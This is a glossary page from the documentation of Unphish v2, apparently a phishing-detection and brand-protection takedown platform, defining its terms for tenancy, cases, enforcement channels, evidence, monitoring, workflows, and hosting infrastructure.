Unphish v2 Docs
Background

Glossary

Definitions for every term used across the Unphish v2 platform.

Definitions are alphabetized within each section.

Tenancy and identity

API Application — A client-side OAuth-style application registration. Holds one or more API keys.

API Key — A scoped, revocable credential that authenticates programmatic access. Tracks last-used timestamp and is rate-limited.

Brand — A protected entity (trademark, product line, domain identity) belonging to a client. One client can own many brands. Carries logos, screenshots, official visual references, and color/identity metadata.

Client — A rights owner under an organization. The customer for whom enforcement happens. A client owns brands, policies, quotas, and members.

Identity — A user's authentication record at Authentik (sub, email, profile). Mapped to an app user by email or stable subject.

Membership — A user's relationship to an organization or client, including a canonical role.

Organization — The top-level tenant. Unphish itself, each partner, and each direct customer is one organization.

SSO Domain — A verified email domain that controls organization sign-in routing.

System Role — The internal Unphish-wide role: user, staff, or admin. Distinct from organization role. Controls Hub, delivery board, and architecture access.

Team Invitation — An app-owned invite token with email, role, organization or client scope, expiry, and accepted/revoked timestamps.

User — An authenticated person.

Cases and enforcement

Case — The central record for one threat against one brand. Carries status, activity, evidence, classification, and workflow.

Case Activity — The fine-grained lifecycle stage of a case (agent_review, client_review, enforcement_submitted, etc.).

Case Status — The high-level state of a case (open, pending, enforcing, verifying, closed, dismissed, reopened, on_hold).

Classification Run — A model + rules output for a case. Stores visual, NLP, domain, and evidence sub-scores plus confidence, label, route, and explanation.

Enforcement — A takedown record linked to one or more cases. Dispatched on a specific channel.

Enforcement Channel — A configured route for action: XARF, CleanDNS, registrar, hosting provider, Meta, X, Cloudflare, Google Safe Browsing, Microsoft SmartScreen, or manual browser-extension.

Enforcement Statusdraft, form_filled, queued, submitted, received_request, actioned_request, partial_action, rejected_request, escalated, cancelled.

Enforcement Submission — The specific outbound submission for one enforcement on one channel.

Enforcement Template — The channel-specific form, email, API, or XARF schema.

Provider Response — A received, actioned, partial, rejected, unresponsive, or escalation response from an enforcement channel.

Evidence

Attachment — A user- or system-provided evidence file.

DNS Record Set — A, AAAA, MX, NS, TXT, CNAME records plus ASN, host, ISP, country.

Email Evidence — Headers, MX records, attachments, and parsed indicators for an email-based threat.

Evidence Package — The canonical bundle of all evidence used for review and enforcement.

HTML Analysis — Title, meta tags, forms, scripts, text, language, and intent summary for a captured page.

Note — An analyst, client, or system comment on a case. Has a type, title, body, author, and optional linked event.

Redirect Trace — The ordered HTTP redirect chain with status, headers, and final URL.

Screenshot — A desktop, mobile, or full-page capture with device, browser, viewport, geo, and timestamp.

SSL Certificate — Issuer, subject, SANs, validity, CT log references, and free-cert indicators.

Tag — A categorization label for filtering and workflow.

WHOIS / RDAP Record — Registrar, registrant-derived data where legal, creation/update/expiry dates.

Detection and monitoring

Detection Source — A module or provider that produced a threat (URLScan, WhoisXML, NothingPhishy, gse.live, WhoisFreaks, client API, manual entry).

Query Folder — A grouping for related scan queries.

Query Keyword — An included or excluded keyword in a scan query.

Query Site Search / Query Site Exclusion — Included or excluded sites or domains in a scan query.

Resurrection Monitor — The post-closure monitoring window. Defaults to 30 days. Reopens the case if the threat reappears.

Scan — An execution run for one or more detection queries.

Scan Query — The configured parameters for one scan.

Threat Submission — A manual, API, feed, bulk, or workbench-submitted threat. Becomes a case, watchlist item, or dismissal.

Verification Check — A scheduled or manual DNS, HTTP, visual, provider, or blocklist check.

Verification Statusactive, checking, down, partially_down, resurrected, inconclusive, failed.

Watchlist Item — A monitored domain or asset, typically one that is dormant or awaiting activation.

Watchlist Subscriber — A user subscribed to alerts for a watchlist item.

Watchlist Update — A DNS, subdomain, status-code, WHOIS, screenshot, metadata, or availability change on a watchlist item.

Whitelist Item — An approved URL, domain, email, or entity that should not create cases.

Workflows and intelligence

Indicator — A domain, URL, IP, ASN, certificate, email, hash, or other IOC.

Policy Decision — The evaluated client policy with approval requirement, selected channel, automation threshold, and routing reason.

Threat Actor — An inferred or known adversary profile.

Threat Cluster — A campaign grouping based on shared infrastructure, behavior, brand, source, or evidence.

Workflow Run — A durable orchestration instance, typically backed by Temporal, for a case or batch.

Workflow Step — A deterministic step within a workflow with payload, result, duration, retries, errors, and logs.

Workflow Step Statuspending, running, paused, succeeded, failed, retrying, cancelled, skipped.

Operations and infrastructure

Audit Log — The append-only record of security, data, workflow, and operational events.

Authentik — The identity provider. Runs outside Vercel on its own infrastructure. Owns passwords, recovery, MFA, and SSO federation.

Data Source Status — The provenance label on a piece of data: live, imported, demo, fixture, or unavailable.

Demo — The customer-facing demonstration environment. Curated fixtures, scripted journeys, no real mutations.

Hub — The internal Unphish operating console. Environment tiles, team, secrets, readiness, audit.

Neon / Postgres — The primary database for Unphish v2.

Postmark — The transactional email provider for invitations, notifications, and reports.

Render — The host for the long-running Temporal worker, Authentik, and other always-on services. Vercel handles the Next.js app; Render handles workers and identity.

Report Run — A generated report output with recipients, status, metrics, and file references.

Report Schedule — A weekly, monthly, or custom-cadence report configuration.

Staging — The pre-production environment. Same routes as production, staging-safe external effects.

Temporal — The durable workflow orchestrator. Powers ingestion, enrichment, enforcement, verification, and scheduled reports.

Temporal Cloud — The hosted Temporal namespace where workflow state lives.

Vercel — The host for the Next.js application and preview deployments.

Workbench — The developer/QA sandbox surface. Same data contracts as production with provider transport switched to fixture or sandbox mode.

Previous

Goals and non-goals

Next

User Guide

On this page